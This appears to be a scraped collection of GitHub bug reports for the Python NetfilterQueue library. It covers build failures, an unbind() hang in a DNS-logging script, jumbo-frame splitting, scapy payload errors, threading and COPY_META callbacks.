tstate->exc_value = local_value; ^~~~~~~~~ curexc_value netfilterqueue.c:7594:13: error: ‘PyThreadState {aka struct _ts}’ has no member named ‘exc_traceback’; did you mean ‘curexc_traceback’? tstate->exc_traceback = local_tb; ^~~~~~~~~~~~~ curexc_traceback error: command 'gcc' failed with exit status 1

netfilterqueue hangs on unbind

I simply wanted to analyze and test DNS packets and view them on my console. The problem is when I call unbind() method of netfilterqueue, it hangs on the program. This does not happens every time. Plz help me If anyone of you know how to unbind without hanging. (see line 83)

import time
from netfilterqueue import NetfilterQueue
from scapy.all import *
import os
import sys
import threading
from random import randint
import colored

class DNS_analyze(object):
    def __init__(self, net_interface):
        self.q = NetfilterQueue()
        self.net_interface = net_interface

    ## We need to identify what kind of packet we receive
    def dns_debug_print(self, ip_pkt):
        sep_str = colored.attr('bold') + colored.fg('white') + "|" + colored.attr('reset')

        try:
            dns_id = "{}{}{}".format(colored.fg('cyan'), str(ip_pkt[DNS].id), colored.attr('reset'))
            dns_query = "{}{}{}".format(colored.fg('light_green'), str(ip_pkt[DNS].qd.qname.decode("utf-8")), colored.attr('reset'))
            dns_qtype = "{}{}{}".format(colored.fg(169), dnsqtypes[ip_pkt[DNS].qd.qtype], colored.attr('reset'))
            dns_qclass = "{}{}{}".format(colored.fg(3), dnsclasses[ip_pkt[DNS].qd.qclass], colored.attr('reset'))
        except Exception as e:
            print("Exception occured.. {}".format(e))
            return

        fmt_str = "%s:%s -> %s:%s|%s%s%s%s%s%s%s" % (
            ip_pkt.src, ip_pkt[UDP].sport,
            ip_pkt.dst, ip_pkt[UDP].dport,
            dns_id,
            sep_str,
            dns_qtype,
            sep_str,
            dns_query,
            sep_str,
            dns_qclass
            )
        with open('dns_analyze_log.txt', 'a') as the_file:
            the_file.write(fmt_str + '\n')
        print(fmt_str)

    def callback(self, pkt):
        orig_pkt = IP(pkt.get_payload())
        self.dns_debug_print(orig_pkt)
        pkt.accept()

    def _analyze(self):
        self.q.bind(1, self.callback)
        self.q.run()

    def stop(self):
        print("[*] Restoring iptables DNS hook.")
        os.system('iptables -i '+ self.net_interface +' -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
        self.q.unbind()
        print("[*] unbinded netfilter hook.")

    def start(self):
        os.system('iptables -i '+ self.net_interface +' -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1')
        t = threading.Thread(name='DNS_analyze', target=self._analyze)
        t.setDaemon(True)
        t.start()


dns__analyze = DNS_analyze('wlan0')

try:
    dns__analyze.start()
    while 1:
        time.sleep(1)
except KeyboardInterrupt:
    print('stopping dns_analyze')

dns__analyze.stop()

Jumbo frames (even with DEF BufferSize changed) are still split up

After applying the recommended change in the "Limitations" section of README.rst and changing DEF BufferSize to 9000 and compiling from the source, any packets received which are greater than 1500 bytes are continued to be split into multiple packets before being passed to the callback function of the NetfilterQueue object.

Kali 2.x rolling
All interfaces have a MTU of 9000

ImportError: No module named NetfilterQueue

While running python program I am getting "ImportError: No module named NetfilterQueue" this error. NetfilterQueue already installed on the system. can you please help me in this. Please find screenshot for your reference.
Screenshot from 2020-03-14 17-37-25

MAC OSX 10.11.6 error

sudo python ~/pip2.py install --ignore-installed --trusted-host pypi.douban.com -i http://pypi.douban.com/simple NetfilterQueue
Collecting NetfilterQueue
Downloading http://pypi.doubanio.com/packages/7b/c3/204d47c1c47a7fd6ac1e4e341bdc6021f8142e6c7b6e488436592a6d2488/NetfilterQueue-0.7.tar.gz (55kB)
100% |████████████████████████████████| 61kB 898kB/s
Installing collected packages: NetfilterQueue
Running setup.py install for NetfilterQueue ... error
Complete output from command /opt/local/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -u -c "import setuptools, tokenize;file='/private/tmp/pip-build-qrP4zk/NetfilterQueue/setup.py';exec(compile(getattr(tokenize, 'open', open)(file).read().replace('\r\n', '\n'), file, 'exec'))" install --record /tmp/pip-WDyKSL-record/install-record.txt --single-version-externally-managed --compile:
running install
running build
running build_ext
cythoning netfilterqueue.pyx to netfilterqueue.c
building 'netfilterqueue' extension
creating build
creating build/temp.macosx-10.11-x86_64-2.7
/usr/bin/clang -fno-strict-aliasing -fno-common -dynamic -pipe -Os -fwrapv -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -I/opt/local/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7 -c netfilterqueue.c -o build/temp.macosx-10.11-x86_64-2.7/netfilterqueue.o
netfilterqueue.c:276:10: fatal error: 'libnfnetlink/linux_nfnetlink.h' file not found
#include "libnfnetlink/linux_nfnetlink.h"
^
1 error generated.
error: command '/usr/bin/clang' failed with exit status 1

----------------------------------------

Command "/opt/local/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -u -c "import setuptools, tokenize;file='/private/tmp/pip-build-qrP4zk/NetfilterQueue/setup.py';exec(compile(getattr(tokenize, 'open', open)(file).read().replace('\r\n', '\n'), file, 'exec'))" install --record /tmp/pip-WDyKSL-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /private/tmp/pip-build-qrP4zk/NetfilterQueue/

set_payload() throws TypeError

After I was able to install NetfilterQueue (see #53), I received a TypeError when using set_payload() after directly changing a payload attribute.

On Debian Stretch this has worked without any problems for years. At this moment I use Debian Buster 10.2, NetfilterQueue 0.8.1, Python 3.7.3 and python3-scapy 2.4.0-2.

pkt = IP(packet.get_payload())
...
pkt[UDP].payload = bytes(response)
...
packet.set_payload(bytes(pkt))

This problem can be fixed using two different ways:

pkt[UDP].remove_payload()
pkt[UDP].add_payload(bytes(response))
pkt[UDP].payload = conf.raw_layer(load=response)
Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "modifier.py", line 117, in modify
    packet.set_payload(bytes(pkt))
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 345, in __bytes__
    return self.build()
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 444, in build
    p = self.do_build()
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 425, in do_build
    self = next(iter(self))
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  [Previous line repeated 9 more times]
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 826, in loop
    for payl in payloads:
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 819, in loop
    for x in loop(todo[:], done):
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 831, in loop
    pkt = self.clone_with(payload=payl, **done2)
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 804, in clone_with
    pkt.add_payload(payload)
  File "/usr/lib/python3/dist-packages/scapy/packet.py", line 188, in add_payload
    raise TypeError("payload must be either 'Packet' or 'bytes', not [%s]" % repr(payload))
TypeError: payload must be either 'Packet' or 'bytes', not [255]

When I remove python3-scapy (2.4.0-2) and update to scapy 2.4.3 via pip3, the error message changes:

Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "modifier.py", line 117, in modify
    packet.set_payload(bytes(pkt))
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 487, in __bytes__
    return self.build()
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 607, in build
    p = self.do_build()
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 588, in do_build
    self = next(iter(self))
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 960, in loop
    for x in loop(todo[:], done):
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 960, in loop
    for x in loop(todo[:], done):
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 960, in loop
    for x in loop(todo[:], done):
  [Previous line repeated 9 more times]
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 968, in loop
    if self.fields == done and payloads.__iterlen__() == 1:
  File "/usr/local/lib/python3.7/dist-packages/scapy/packet.py", line 1023, in __iterlen__
    return length * self.payload.__iterlen__()
AttributeError: 'bytes' object has no attribute '__iterlen__'

Does not support threaded operation

Hi,

It would be nice to be able to run this in a thread.

Right now, if I call run() or run_socket() in a thread (daemon or otherwise), the process deadlocks when I call the unbind() method. Omitting the unbind() method "works" but doesn't seem like a clean solution.

Using the non-blocking functionality of the run() method via the optional block argument only allows polling. This is inefficient because instead of waiting on netfilter queue I/O most of the time, the script would be waiting on its polling timer most of the time which would increase delay.

My work-around is to set a timeout on the socket and poll a stop flag whenever a timeout occurs:

def nfq_threadproc():
    while not stop:
        try:
            nfqueue.run_socket(s)
        except socket.timeout:
            pass

nfqueue = NetfilterQueue()
nfqueue.bind(1, handle_pkt)  # Definition omitted for brevity
s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) # Taken the from example code
s.settimeout(1)
stop = False

t = threading.Thread(target=nfq_threadproc)
t.start()

time.sleep(5)  # Do something else here

stop = True
t.join()

It would be nice if this library used multiplexed I/O to efficiently permit threaded operation. This would entail using something like the select() library call (or something more modern like epoll(), at a cost to backward compatibility) instead of recv(). The interface could allow the user to specify the timeout interval via an optional run()/run_socket() argument or a new setter method. It could then check a flag at each iteration that would be set by the unbind() method to determine when another thread has initiated shutdown of the queue.

Let me know if I'm missing an easier way to accomplish my goal. Otherwise, I’d be happy to write up a gist or try my hand at a pull request for this if you agree it is a deficiency and is worth addressing.

Not Python 3 compatible

python3 setup.py install runs okay, but importing gives an error:

>>> from netfilterqueue import NetfilterQueue
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: /usr/local/lib/python3.4/dist-packages/netfilterqueue.cpython-34m.so: undefined symbol: PyString_FromStringAndSize

Fails when doing the callback with COPY_META

Hi,
I am trying to bind to an NFQUEUE configured with COPY_META only, as I only intend to retrieve the packet mark. I would think that maybe when a Packet() is created, we should indicate the operation mode of the queue somehow...

I'm using the latest version of the code :)

Exception ignored in: 'netfilterqueue.global_callback'
Traceback (most recent call last):
  File "netfilterqueue.pyx", line 69, in netfilterqueue.Packet.set_nfq_data (netfilterqueue.c:2193)
OSError: Failed to get payload of packet.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.